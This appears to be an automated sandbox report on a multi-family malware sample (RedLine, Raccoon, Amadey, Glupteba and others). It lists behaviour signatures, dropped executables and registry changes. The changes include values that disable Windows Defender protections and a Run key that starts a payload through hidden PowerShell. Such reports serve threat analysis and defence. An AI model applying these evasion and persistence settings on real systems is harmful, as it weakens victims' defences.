Malware Analysis Report

2025-08-05 16:12

Sample ID 231026-j4mxxafb3x
Target 1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b
SHA256 1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b
Tags
amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b

Threat Level: Known bad

The file 1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware stealer trojan

Glupteba

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

Amadey

ZGRat

Glupteba payload

Raccoon

RedLine

Detect ZGRat V1

Raccoon Stealer payload

Modifies Windows Defender Real-time Protection settings

DcRat

RedLine payload

Drops file in Drivers directory

Modifies Windows Firewall

Downloads MZ/PE file

Stops running service(s)

Reads user/profile data of web browsers

Executes dropped EXE

Windows security modification

Loads dropped DLL

Checks computer location settings

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Program crash

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious behavior: GetForegroundWindowSpam

Creates scheduled task(s)

Suspicious behavior: MapViewOfSection

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-26 08:13

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-26 08:13

Reported

2023-10-26 08:16

Platform

win10v2004-20231023-en

Max time kernel

93s

Max time network

157s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7DAC.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9879.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7A3C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7B18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7CA0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7DAC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7EB7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JL56KD9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9879.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9A9D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9CA2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A463.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Lj998Dz.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Drive Tools\zDriveTools.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\478A.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\9A9D.exe'\"" C:\Users\Admin\AppData\Local\Temp\9A9D.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7A3C.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Drive Tools\is-2PIL8.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\Drive Tools\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-DQGSI.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-5DV4U.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-J7RLE.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-9B0RE.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-1FH92.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\Drive Tools\zDriveTools.exe C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files (x86)\Drive Tools\is-TO13U.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-6UEO5.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\Lang\is-Q64NC.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-2UQDS.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-Q69EF.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-SD465.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-3H7GU.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-MESDL.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-TVKF8.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-MPRLA.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-UBOBD.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-LLEIT.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-ILBID.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-UK9NO.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-E5230.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\7EB7.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
